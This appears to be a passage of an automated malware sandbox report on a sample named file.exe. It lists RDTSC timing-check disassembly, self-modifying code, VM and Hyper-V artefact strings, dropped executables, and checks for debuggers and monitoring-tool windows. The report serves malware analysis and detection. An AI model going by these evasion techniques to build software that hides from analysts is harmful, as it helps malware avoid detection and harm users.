Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00D28 second address: 4A00D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6E644F752Ah 0x0000000a jmp 00007F6E644F7535h 0x0000000f popfd 0x00000010 popad 0x00000011 push ecx 0x00000012 push ebx 0x00000013 pop ecx 0x00000014 pop edi 0x00000015 popad 0x00000016 nop 0x00000017 jmp 00007F6E644F7536h 0x0000001c push eax 0x0000001d jmp 00007F6E644F752Bh 0x00000022 nop 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F6E644F7535h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00E44 second address: 4A00E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00E48 second address: 4A00E4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00E4C second address: 4A00E52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00E52 second address: 4A00E58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00E58 second address: 4A00E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00E5C second address: 4A00E60 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00E60 second address: 4A00EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F6E64DC24C8h 0x00000012 sbb al, FFFFFF88h 0x00000015 jmp 00007F6E64DC24BBh 0x0000001a popfd 0x0000001b pushad 0x0000001c jmp 00007F6E64DC24C6h 0x00000021 mov si, EF01h 0x00000025 popad 0x00000026 popad 0x00000027 mov edx, 772406ECh 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00EBC second address: 4A00EC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00EC2 second address: 4A00EC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00EC8 second address: 4A00ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00ECC second address: 4A00F2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub eax, eax 0x0000000a jmp 00007F6E64DC24BFh 0x0000000f lock cmpxchg dword ptr [edx], ecx 0x00000013 pushad 0x00000014 pushad 0x00000015 mov bx, ax 0x00000018 mov cx, C58Dh 0x0000001c popad 0x0000001d mov esi, 7A842D89h 0x00000022 popad 0x00000023 pop edi 0x00000024 jmp 00007F6E64DC24C4h 0x00000029 test eax, eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov esi, edi 0x00000030 jmp 00007F6E64DC24C9h 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00F2F second address: 4A00F3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E644F752Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00F3F second address: 4A00F7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F6ED7580C42h 0x00000011 jmp 00007F6E64DC24C6h 0x00000016 mov edx, dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F6E64DC24BAh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00F7D second address: 4A00F81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00F81 second address: 4A00F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00F87 second address: 4A00F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00F8D second address: 4A00FC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esi] 0x0000000d pushad 0x0000000e popad 0x0000000f mov dword ptr [edx], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E64DC24C2h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00FC5 second address: 4A00FDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00FDD second address: 4A00FE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00FE1 second address: 4A00FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A00FE7 second address: 4A01004 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E64DC24C9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01004 second address: 4A0103B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+04h], eax 0x0000000b pushad 0x0000000c call 00007F6E644F7533h 0x00000011 mov edi, ecx 0x00000013 pop ecx 0x00000014 mov edx, 61C184A8h 0x00000019 popad 0x0000001a mov eax, dword ptr [esi+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6E644F752Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0103B second address: 4A0107B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F6E64DC24BDh 0x0000000b sbb eax, 3A53B8C6h 0x00000011 jmp 00007F6E64DC24C1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+08h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6E64DC24BDh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0107B second address: 4A0110D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+0Ch] 0x0000000c jmp 00007F6E644F752Eh 0x00000011 mov dword ptr [edx+0Ch], eax 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F6E644F752Eh 0x0000001b and cx, 56F8h 0x00000020 jmp 00007F6E644F752Bh 0x00000025 popfd 0x00000026 call 00007F6E644F7538h 0x0000002b pushfd 0x0000002c jmp 00007F6E644F7532h 0x00000031 and eax, 42AF2088h 0x00000037 jmp 00007F6E644F752Bh 0x0000003c popfd 0x0000003d pop esi 0x0000003e popad 0x0000003f mov eax, dword ptr [esi+10h] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0110D second address: 4A0111D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0111D second address: 4A011ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6E644F7531h 0x00000009 xor esi, 5C71F656h 0x0000000f jmp 00007F6E644F7531h 0x00000014 popfd 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [edx+10h], eax 0x0000001d jmp 00007F6E644F752Ch 0x00000022 mov eax, dword ptr [esi+14h] 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F6E644F752Eh 0x0000002c sbb cx, 57A8h 0x00000031 jmp 00007F6E644F752Bh 0x00000036 popfd 0x00000037 call 00007F6E644F7538h 0x0000003c pushfd 0x0000003d jmp 00007F6E644F7532h 0x00000042 add eax, 552AC538h 0x00000048 jmp 00007F6E644F752Bh 0x0000004d popfd 0x0000004e pop esi 0x0000004f popad 0x00000050 mov dword ptr [edx+14h], eax 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 pushfd 0x00000057 jmp 00007F6E644F7530h 0x0000005c adc ah, FFFFFF98h 0x0000005f jmp 00007F6E644F752Bh 0x00000064 popfd 0x00000065 mov eax, 4C00214Fh 0x0000006a popad 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A011ED second address: 4A011FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A011FE second address: 4A01202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01202 second address: 4A01216 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0139A second address: 4A013B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7531h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A013B8 second address: 4A013BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A013BC second address: 4A013C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A013C0 second address: 4A013C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A013C6 second address: 4A01456 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7532h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+2Ch], ecx 0x0000000c jmp 00007F6E644F7530h 0x00000011 mov ax, word ptr [esi+30h] 0x00000015 pushad 0x00000016 mov esi, 267747FDh 0x0000001b pushfd 0x0000001c jmp 00007F6E644F752Ah 0x00000021 add ax, 20D8h 0x00000026 jmp 00007F6E644F752Bh 0x0000002b popfd 0x0000002c popad 0x0000002d mov word ptr [edx+30h], ax 0x00000031 jmp 00007F6E644F7536h 0x00000036 mov ax, word ptr [esi+32h] 0x0000003a jmp 00007F6E644F7530h 0x0000003f mov word ptr [edx+32h], ax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F6E644F752Ah 0x0000004c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01456 second address: 4A0145A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0145A second address: 4A01460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01460 second address: 4A0147F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, A6h 0x00000005 mov bx, B6DCh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esi+34h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F6E64DC24BEh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A0147F second address: 4A01485 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A01485 second address: 4A014DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+34h], eax 0x0000000b jmp 00007F6E64DC24C9h 0x00000010 test ecx, 00000700h 0x00000016 jmp 00007F6E64DC24BEh 0x0000001b jne 00007F6ED7580710h 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F6E64DC24C7h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F013F second address: 49F0162 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F7535h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f movsx edx, cx 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0162 second address: 49F01A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F6E64DC24C9h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F6E64DC24BEh 0x00000015 mov ebp, esp 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F01A2 second address: 49F01A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F01A6 second address: 49F01AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F01AC second address: 49F01B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F01B2 second address: 49F01D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov cx, dx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F01D0 second address: 49F01D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0300 second address: 49F0306 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0306 second address: 49F0383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F6E644F7530h 0x0000000e mov dword ptr [esp], ebp 0x00000011 jmp 00007F6E644F7530h 0x00000016 mov ebp, esp 0x00000018 jmp 00007F6E644F7530h 0x0000001d mov eax, dword ptr [ebp+08h] 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007F6E644F752Dh 0x00000028 pop esi 0x00000029 pushfd 0x0000002a jmp 00007F6E644F7531h 0x0000002f adc ecx, 1D3F1EC6h 0x00000035 jmp 00007F6E644F7531h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F0383 second address: 49F03B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E64DC24C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6E64DC24C8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49F03B5 second address: 49F03C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E644F752Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 49D0D7C second address: 49D0D84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 473B55 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 61E7DE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 642D83 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 6A1E48 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004739CC rdtsc

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1]			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Bunifu_UI_v1.5.3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F4wAzFA73Du5NVFF3Wt42\Y-Cleaner.exe			Jump to dropped file

Source: C:\Users\user\Desktop\file.exe TID: 7392	Thread sleep time: -44022s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316	Thread sleep count: 86 > 30			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316	Thread sleep count: 85 > 30			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316	Thread sleep count: 83 > 30			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316	Thread sleep count: 86 > 30			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316	Thread sleep count: 89 > 30			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316	Thread sleep count: 84 > 30			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7316	Thread sleep count: 91 > 30			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7388	Thread sleep time: -30015s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7364	Thread sleep time: -44022s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00417727 FindFirstFileExW,		0_2_00417727
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_10007EA9 FindFirstFileExW,		0_2_10007EA9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_04A3798E FindFirstFileExW,		0_2_04A3798E

Source: file.exe, file.exe, 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.13.dr	Binary or memory string: VMware
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.13.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.13.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.13.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: file.exe, 00000000.00000002.1947623162.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.13.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: file.exe, 00000000.00000002.1947623162.0000000000BAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`
Source: Amcache.hve.13.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.13.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.13.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.13.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.13.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.13.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.13.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.13.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.13.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.13.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.13.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.13.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: file.exe, 00000000.00000002.1946801836.00000000005FB000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Amcache.hve.13.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.13.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006FCBDA Start: 006FCC0E End: 006FCC12

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004739CC rdtsc

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040CDE3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00402A50 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

